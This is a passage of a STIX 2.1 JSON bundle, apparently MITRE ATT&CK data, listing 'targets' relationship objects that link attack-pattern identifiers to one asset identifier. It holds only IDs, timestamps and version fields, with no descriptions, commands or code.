"x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--dacc32d6-b3a1-463f-9112-98dde52421f8", "created": "2024-07-01T10:37:15.833579", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833581", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--59ff91cd-1430-4075-8563-e6f15f4f9ff5", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1e825557-5c45-4767-b67e-a475af71fdee", "created": "2024-07-01T10:37:15.833589", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833591", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5b0ad6f8-6a16-4966-a4ef-d09ea6e2a9f5", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e29402dc-3bab-405f-a071-3f77d452a277", "created": "2024-07-01T10:37:15.833598", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833601", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5bfccc3f-2326-4112-86cc-c1ece9d8a2b5", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b54ad9ff-4adc-442d-bf00-11f0e0f4a6da", "created": "2024-07-01T10:37:15.833608", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833610", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5d0d3609-d06d-49e1-b9c9-b544e0c618cb", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c9c7bf72-5999-453d-940b-edbe3e72cb1f", "created": "2024-07-01T10:37:15.833618", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833620", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5e4a2073-9643-44cb-a0b5-e7f4048446c7", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--fc630220-9e94-49f3-9afd-5965867fff5d", "created": "2024-07-01T10:37:15.833627", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833629", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--60b508a1-6a5e-46b1-821a-9f7b78752abf", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f8026b84-842a-4e97-ad99-d0ead21b263f", "created": "2024-07-01T10:37:15.833637", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833639", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--613d08bc-e8f4-4791-80b0-c8b974340dfd", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1c7fb248-4980-4f21-9f3e-9faf04179849", "created": "2024-07-01T10:37:15.833647", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833649", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--6151cbea-819b-455a-9fa6-99a1cc58797d", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7bb2e689-381f-483d-812b-1030fc9b3057", "created": "2024-07-01T10:37:15.833657", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833659", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--63220765-d418-44de-8fae-694b3912317d", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--37c028ed-656d-4af7-9fc4-5d39fa94caa6", "created": "2024-07-01T10:37:15.833666", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833668", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--633a100c-b2c9-41bf-9be5-905c1b16c825", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--105c3fdd-a1f4-41f7-86f6-b11afa817375", "created": "2024-07-01T10:37:15.833676", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833678", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--635cbe30-392d-4e27-978e-66774357c762", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--95ec69b5-af2a-4b81-bd05-29db3f2fadbe", "created": "2024-07-01T10:37:15.833686", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833688", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--64196062-5210-42c3-9a02-563a0d1797ef", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6874b622-91d8-4ef2-8d55-e5559e4b9ed8", "created": "2024-07-01T10:37:15.833695", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833697", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--65917ae0-b854-4139-83fe-bf2441cf0196", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5882dc51-dc20-4513-a843-40ff453dee4d", "created": "2024-07-01T10:37:15.833705", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833707", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--67720091-eee3-4d2d-ae16-8264567f6f5b", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d18f9210-807e-4455-a913-94e6c9e07da8", "created": "2024-07-01T10:37:15.833715", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833717", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--6831414d-bb70-42b7-8030-d4e06b2660c9", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8b4a0506-0334-4eb9-a7ba-48e0702b11b2", "created": "2024-07-01T10:37:15.833724", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833726", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--692074ae-bb62-4a5e-a735-02cb6bde458c", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--21d60009-8242-4f4a-a5cd-3af475e1d920", "created": "2024-07-01T10:37:15.833734", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833736", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--69b8fd78-40e8-4600-ae4d-662c9d7afdb3", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d5f1626f-c82f-4db9-9115-4e5dbc5538ee", "created": "2024-07-01T10:37:15.833743", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833745", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b674546e-fc4f-4607-a488-069b4665889b", "created": "2024-07-01T10:37:15.833753", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833755", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--6add2ab5-2711-4e9d-87c8-7a0be8531530", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--77c7ddb5-d032-4694-a89b-bba42f46d92b", "created": "2024-07-01T10:37:15.833763", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833765", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--6b57dc31-b814-4a03-8706-28bc20d739c4", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cc2ff9b7-e5b9-4408-a1a7-3f615da8046a", "created": "2024-07-01T10:37:15.833772", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833774", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--6faf650d-bf31-4eb4-802d-1000cf38efaf", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4ae6dba5-6fc4-48bc-9c9e-a45ba7bc7eed", "created": "2024-07-01T10:37:15.833782", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833784", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3cb8b51d-01df-42b2-9948-3c80f1b984b4", "created": "2024-07-01T10:37:15.833792", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833794", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--72b74d71-8169-42aa-92e0-e7b04b9f5a08", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d72d0f28-faf4-4928-8d5a-034975a0c7e5", "created": "2024-07-01T10:37:15.833802", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833804", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9b16000e-6552-44b7-9cac-3b84734f22fe", "created": "2024-07-01T10:37:15.833811", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833813", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5d7ec873-5fec-4b77-ba45-e144cf35c77f", "created": "2024-07-01T10:37:15.833821", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833823", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--74d2a63f-3c7b-4852-92da-02d8fbab16da", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--588fab63-111b-4c68-a685-949c70d28ff9", "created": "2024-07-01T10:37:15.833830", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833832", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7610cada-1499-41a4-b3dd-46467b68d177", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5c971b16-0e1e-41f6-ad6c-e4e510c08291", "created": "2024-07-01T10:37:15.833840", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833842", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--774a3188-6ba9-4dc4-879d-d54ee48a5ce9", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8f156801-ade6-4aec-810d-c89040de6dde", "created": "2024-07-01T10:37:15.833850", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833852", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--77eae145-55db-4519-8ae5-77b0c7215d69", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bcac2450-4e21-4a4a-ac67-5c8bf31910d8", "created": "2024-07-01T10:37:15.833859", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833862", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--791481f8-e96a-41be-b089-a088763083d4", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1e1848a5-409d-43d7-b328-1869859e1e91", "created": "2024-07-01T10:37:15.833869", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833871", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--799ace7f-e227-4411-baa0-8868704f2a69", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f7aab1d1-4d8c-4af3-bca4-441bdc401d89", "created": "2024-07-01T10:37:15.833879", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833881", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--79a4052e-1a89-4b09-aea6-51f1d11fe19c", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c3ced2a8-22f4-4195-9b30-1f911de855bb", "created": "2024-07-01T10:37:15.833888", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833890", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0d52b613-fae9-47e5-aaec-916b4f3f6778", "created": "2024-07-01T10:37:15.833898", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833900", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7bd9c723-2f78-4309-82c5-47cad406572b", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--05d4111e-391f-4cdc-8cb7-7e2a16f92d2e", "created": "2024-07-01T10:37:15.833908", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833910", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--47c16254-5564-4d0b-8ba1-f737f82417fd", "created": "2024-07-01T10:37:15.833918", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833920", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7d77a07d-02fe-4e88-8bd9-e9c008c01bf0", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7f47fbd2-828d-4b21-bb70-d704921fb29e", "created": "2024-07-01T10:37:15.833927", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833930", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--31e6cfcb-a9de-40de-9e51-a833de11956f", "created": "2024-07-01T10:37:15.833937", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833939", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7de1f7ac-5d0c-4c9c-8873-627202205331", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--16ded003-49e4-46bc-a8c3-90715ad02887", "created": "2024-07-01T10:37:15.833947", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833949", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2def6356-1b86-43da-8758-70cf1561fc64", "created": "2024-07-01T10:37:15.833956", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833959", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7f0ca133-88c4-40c6-a62f-b3083a7fbc2e", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2f6130b6-d96f-4bf0-8feb-b6b9a18b7c81", "created": "2024-07-01T10:37:15.833966", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833968", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0a8aec46-0d52-4ab9-9a0c-49c582306c42", "created": "2024-07-01T10:37:15.833976", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": 